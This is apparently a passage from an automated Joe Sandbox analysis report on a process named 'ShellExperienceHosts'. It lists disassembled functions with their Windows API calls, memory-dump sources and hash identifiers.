Opcode Fuzzy Hash: 3279e268b00249dcc59e276925c40f5f4fae842c55f4ffce8b74c3798184a3e7
Instruction Fuzzy Hash: 131106717442C5BFDB202FA5AC06B8F7FBCEB42768F218124ED55D7590DBB08D8096A2

Function 6C9BB86B Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C9BB8A5
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C9BB8CF
GetCapture.USER32 ref: 6C9BB8E5
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6C9BB8F4

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 9388eeba01d83212e9adf6884ec37bb529e40e950d63a8a30e47f9fa19029e98
Instruction ID: 12a38b961b134ff90761025f4bd5b935afedb42b2e42691a66fa687122f61621
Opcode Fuzzy Hash: 9388eeba01d83212e9adf6884ec37bb529e40e950d63a8a30e47f9fa19029e98
Instruction Fuzzy Hash: CC115E7130064ABFEF211B619C88FBF7A7EFF58798F040024F60967AA5CB719C119660

Function 6C9F3927 Relevance: 6.1, APIs: 4, Instructions: 70timewindowCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,0000EC17), ref: 6C9F393B
KillTimer.USER32(?,0000EC18), ref: 6C9F3949
IsWindow.USER32(?), ref: 6C9F39B9
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9F39E0

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: KillTimer$MessagePostWindow
String ID:
API String ID: 3970157719-0
Opcode ID: 61c70745f1a99909187f743351fe4d53248433fe9a85397f045c414387cc14b7
Instruction ID: c6bfda5ea74f787b99ecd5473ac20fb97c1a36ff48637111dc3d0b05a7c57861
Opcode Fuzzy Hash: 61c70745f1a99909187f743351fe4d53248433fe9a85397f045c414387cc14b7
Instruction Fuzzy Hash: 4721CF31704245EFEF049F71D889B9D7BB9FF55314F200165E819AB691DB70E842CB51

Function 6C9B4650 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,00000006), ref: 6C9B4668
LoadResource.KERNEL32(?,00000000), ref: 6C9B467C

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Resource$FindLoad
String ID:
API String ID: 2619053042-0
Opcode ID: f995bea8fe562f4df9afbfefb0a041e556db763955d3d7cc98493fcb1f8b4992
Instruction ID: 88d3c593aa722e41e3afb72d203005788c251848cb4f086a98d31d6f370f4a30
Opcode Fuzzy Hash: f995bea8fe562f4df9afbfefb0a041e556db763955d3d7cc98493fcb1f8b4992
Instruction Fuzzy Hash: 0C01D633B05227BBDB201A6DAC4447BB7BCEF8436A7014627FD4DE7500D631D9109AA0

Function 6C9F42AB Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 6C9F42DD
PtInRect.USER32(?,?,?), ref: 6C9F42F6

Part of subcall function 6C9F2758: ScreenToClient.USER32(?,?), ref: 6C9F2774
Part of subcall function 6C9F2758: GetParent.USER32(?), ref: 6C9F2784
Part of subcall function 6C9F2758: GetClientRect.USER32(?,?), ref: 6C9F2817
Part of subcall function 6C9F2758: MapWindowPoints.USER32(?,?,?,00000002), ref: 6C9F2829
Part of subcall function 6C9F2758: PtInRect.USER32(?,?,?), ref: 6C9F2839

MapWindowPoints.USER32(?,?,?,00000001), ref: 6C9F432C
SendMessageW.USER32(?,00000201,?,?), ref: 6C9F434B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Client$PointsWindow$MessageParentScreenSend
String ID:
API String ID: 2689702638-0
Opcode ID: cd45e1631072aef0ec8912182fcc2d0b05c83b7f0026a617ba6c2f1f52a25126
Instruction ID: 3d0086afad93841de24c98cf593c0aac52469a14fbbf677fca5060dcd7bfca35
Opcode Fuzzy Hash: cd45e1631072aef0ec8912182fcc2d0b05c83b7f0026a617ba6c2f1f52a25126
Instruction Fuzzy Hash: A5218031A0034EEBDF118F61C908AEEBBB6FF49304F10811AF92962650E7B5D955DF50

Function 6C9D66BD Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,00000005,?,00000000,00000000,00000000,?,6C9D5603,00000000,00000000,00000000,?,00000000,?,00000000), ref: 6C9D66DB
LoadResource.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,6C9D5603,00000000,00000000,00000000,?,00000000,?,00000000,00000054), ref: 6C9D66F0
LockResource.KERNEL32(00000000,?,00000000,00000000,00000000,?,6C9D5603,00000000,00000000,00000000,?,00000000,?,00000000,00000054), ref: 6C9D6702
GlobalFree.KERNEL32(?), ref: 6C9D6741

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Resource$FindFreeGlobalLoadLock
String ID:
API String ID: 3898064442-0
Opcode ID: e742f025bd0198fd65ca78f74470d3224e4ec45cdaec9c6182aa22f18ab9402c
Instruction ID: f6dfc030559196e9bc626d043ec2fa4794f4854b0334a196d6c489c1f0d8cec2
Opcode Fuzzy Hash: e742f025bd0198fd65ca78f74470d3224e4ec45cdaec9c6182aa22f18ab9402c
Instruction Fuzzy Hash: 4311D631601B15ABDB215B55C884B8EBBB8AF15368F06C1A8EC08F7700CB70ED04CBA1

Function 6C9E4032 Relevance: 6.1, APIs: 4, Instructions: 61fileCOMMON

Download Yara Rule

APIs

UnlockFile.KERNEL32(?,?,?,?,?), ref: 6C9E4047
GetLastError.KERNEL32 ref: 6C9E4060
WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000000,00000000), ref: 6C9E408A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: File$ErrorLastUnlockWrite
String ID:
API String ID: 1673360954-0
Opcode ID: 44733a53f03f11c65864a106ed6147ce685577394f215c5a71d40f2ec7b82e24
Instruction ID: a27a3ed361c3858f4f0c06631bb34abb72933e6b4dbfb228bc973abda1f50b11
Opcode Fuzzy Hash: 44733a53f03f11c65864a106ed6147ce685577394f215c5a71d40f2ec7b82e24
Instruction Fuzzy Hash: F511A032501128BBCF219FA1DC08DDF7B7CEF19260B108625FA2897A50DB30E918DBE0

Function 6C9D01DA Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000000), ref: 6C9D0227
GetWindowRect.USER32(?,?), ref: 6C9D0243
PtInRect.USER32(?,00000000,00000000), ref: 6C9D0253
CallNextHookEx.USER32(?,?,?), ref: 6C9D027B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$CallCursorHookNextWindow
String ID:
API String ID: 3719484595-0
Opcode ID: 3e6e2795569bc49adc28025f00ae81e1cfa00f67a9c91a45b513e6f5e516a52c
Instruction ID: cc40129947240fb0d2555200e119d8a70ea35123018bcb4eb37900ad8c077532
Opcode Fuzzy Hash: 3e6e2795569bc49adc28025f00ae81e1cfa00f67a9c91a45b513e6f5e516a52c
Instruction Fuzzy Hash: 55216D31B0228A9BCF01DFB4CD08BAEBBB8BF0A31AF51911AE515F7550D730E6449B51

Function 6C9CE3AF Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,00000000), ref: 6C9CE3EA
RegCloseKey.ADVAPI32(00000000), ref: 6C9CE3F3
swprintf.LIBCMT ref: 6C9CE410
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C9CE421

Part of subcall function 6C9CE0F3: RegCloseKey.ADVAPI32(00000000,?,?,?,6C9CDE02,?,00000000,00000018), ref: 6C9CE138

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Close$PrivateProfileStringValueWriteswprintf
String ID:
API String ID: 581541481-0
Opcode ID: 08602306519a2648aa794e60f65fa6d44e5d4b6a25f8f07cae657511f196f2c6
Instruction ID: 172790db61a063f1bc02ee144b8741172bdd4c9ef134aaa407fbb1feb9131530
Opcode Fuzzy Hash: 08602306519a2648aa794e60f65fa6d44e5d4b6a25f8f07cae657511f196f2c6
Instruction Fuzzy Hash: 7E01AD72600208BBDB119E648C86FBF73BCEF49618F104819F605A7680D7B8ED0587A1

Function 6C9B9B21 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000000C,?), ref: 6C9B9B6C
SetBkColor.GDI32(?,?), ref: 6C9B9B76
GetSysColor.USER32(00000008), ref: 6C9B9B86
SetTextColor.GDI32(?,?), ref: 6C9B9B8E

Part of subcall function 6C9D1B2C: GetWindowLongW.USER32(?,000000F0), ref: 6C9D1B47
Part of subcall function 6C9D1B2C: GetClassNameW.USER32(?,?,0000000A), ref: 6C9D1B5C
Part of subcall function 6C9D1B2C: CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 6C9D1B73

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Color$ClassCompareLongNameObjectStringTextWindow
String ID:
API String ID: 3274569906-0
Opcode ID: 873b2f0cca8d1e4f6ccb60782e4ff5035aec572f6b02f16607809e8c985f9181
Instruction ID: b17c5d282c92d99f7096e276c9bd231f1e93d6cbbb25905fa9a384c5af74aa48
Opcode Fuzzy Hash: 873b2f0cca8d1e4f6ccb60782e4ff5035aec572f6b02f16607809e8c985f9181
Instruction Fuzzy Hash: E201A971631625BB9B519E689C48ABF73BCEF5A218F220A09F826E3581CB30D9058760

Function 6C9C0B71 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 6C9C0B8D
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 6C9C0BA0
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 6C9C0BCE
DragFinish.SHELL32(?), ref: 6C9C0C03

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: 6821a313930794e5670a27a0404124462daf694538c128c044c6f219df6ff94e
Instruction ID: fc58f3d11de44ee3a9ce0d54192f7f5c81022dfc54876d68450e0c25c2cc65db
Opcode Fuzzy Hash: 6821a313930794e5670a27a0404124462daf694538c128c044c6f219df6ff94e
Instruction Fuzzy Hash: EC119EB5A0125CABCB20DB24DC8CD9E7BB8FF99304F010199E91AA7241CB309E41CF61

Function 6CB05A56 Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,6CB058F8,00000000,00000004,00000000), ref: 6CB05AA5
GetLastError.KERNEL32(?,?,?,6CA4E4F2,6CA4E542,00000000,00000000,?,?,?,6C9EE531,00000001), ref: 6CB05AB1
__dosmaperr.LIBCMT ref: 6CB05AB8

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 8c327c2066c9a4a12a75ae2901012fb7518fbb3036a5df4e0f6ba30733590a0b
Instruction ID: 0742f24fffde3300187bc44e2696dfb299c0cd4d4d970aa2174be358e97bac4a
Opcode Fuzzy Hash: 8c327c2066c9a4a12a75ae2901012fb7518fbb3036a5df4e0f6ba30733590a0b
Instruction Fuzzy Hash: 10010432601284BBDB008B65CC45BCE7E78EF813B9F208218F424839D0DB70C508C769

Function 6C9C4CD7 Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetDlgCtrlID.USER32(?), ref: 6C9C4CE7
GetScrollPos.USER32(?,00000002), ref: 6C9C4CFA
SendMessageW.USER32(?,00000114,?,?), ref: 6C9C4D34
SetScrollPos.USER32(?,00000002,?,00000000), ref: 6C9C4D52

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Scroll$CtrlMessageSend
String ID:
API String ID: 1219558039-0
Opcode ID: 2214503e4b32bf2118892128df59bd2c422ef2f077c50168abe6e22c4186d34c
Instruction ID: 0d276dc1180d07dee16e010600d1fd5fc9bcffec1e818554731aa3ab5c431daf
Opcode Fuzzy Hash: 2214503e4b32bf2118892128df59bd2c422ef2f077c50168abe6e22c4186d34c
Instruction Fuzzy Hash: 6C119772700258AFEB119FA8C849EAE7BB4FF99340F014569F949AB160D670AC10DB61

Function 6C9C6F73 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9C6F7A
BeginPaint.USER32(?,?,00000004,6C9A235F), ref: 6C9C6FA6
__EH_prolog3.LIBCMT ref: 6C9C6FCF
CreatePen.GDI32(?,?,?), ref: 6C9C6FF0

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: H_prolog3$BeginCreatePaint
String ID:
API String ID: 3507124140-0
Opcode ID: 68642d69ac3dd6ddaec1dc1c157b6376b87dc99d3449b2516c3316f32dc01c8a
Instruction ID: 7e93c663d37473f452f36fddc18881d8dc31aa9edbb861c7afe75d12d58e6f08
Opcode Fuzzy Hash: 68642d69ac3dd6ddaec1dc1c157b6376b87dc99d3449b2516c3316f32dc01c8a
Instruction Fuzzy Hash: C2112AB16006559FEB21DF68C940BAEBAF4AF18704F10881DF66DDBB40C774DA09CB56

Function 6C9DE0AF Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,?,?), ref: 6C9DE0C9
OffsetRect.USER32(?,?,?), ref: 6C9DE0D5
OffsetRect.USER32(?,?,?), ref: 6C9DE0E1
OffsetRect.USER32(?,?,?), ref: 6C9DE0ED

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: e2519868d81a74fde45bdd6a63bf911821cd06e7561acb2bf2fde23683a41c9d
Instruction ID: adb4387ff662443b10db8ffffa7c1f1ed8fb457fc0e6689a9787086c1e793fcd
Opcode Fuzzy Hash: e2519868d81a74fde45bdd6a63bf911821cd06e7561acb2bf2fde23683a41c9d
Instruction Fuzzy Hash: 0E014472601108AFCF149FA9D988D8B7FBCEF96250B018069FD09DB609D730E944CBB0

Function 6C9B5D74 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00000000), ref: 6C9B5D84
GetSubMenu.USER32(00000000,-00000001), ref: 6C9B5D93
GetMenuItemCount.USER32(00000000), ref: 6C9B5DA0
GetMenuItemID.USER32(00000000,00000000), ref: 6C9B5DB6

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Menu$Item$Count
String ID:
API String ID: 879546783-0
Opcode ID: ff56a9c87dc1f583da871a49f32b6fe02229f6416cd36bd832e043957693e8a9
Instruction ID: 4143d78ebecf5a7484e2a4689a12d6b0986e02ee7845f9b76b0e1dd109232775
Opcode Fuzzy Hash: ff56a9c87dc1f583da871a49f32b6fe02229f6416cd36bd832e043957693e8a9
Instruction Fuzzy Hash: 38016D70A11255FFDB118F64DC9CA9F7EBDEF55384F204624E806F6640D630CA41CA90

Function 6C9B5C39 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 6C9B5C59
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 6C9B5C68
IsWindow.USER32(00000000), ref: 6C9B5C79
SetWindowLongW.USER32(00000000,000000F0,?), ref: 6C9B5C89

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 7a14a68c8c0ce42e0cc69ad0f4913e412deec4a3a4076a14732d64a00acc6b52
Instruction ID: d8b33ea2c209d73985ef3c615479595d45732dbcbb2b4a26f9812d0776e3eb2a
Opcode Fuzzy Hash: 7a14a68c8c0ce42e0cc69ad0f4913e412deec4a3a4076a14732d64a00acc6b52
Instruction Fuzzy Hash: F2016231709114BFDF119B64DC48A7E3BB9EF56B24B100359E826A76C4DB74E8019A91

Function 6C9BC0E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 6C9BC0E7
GetTopWindow.USER32(00000000), ref: 6C9BC12A
GetWindow.USER32(00000000,00000002), ref: 6C9BC14C

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

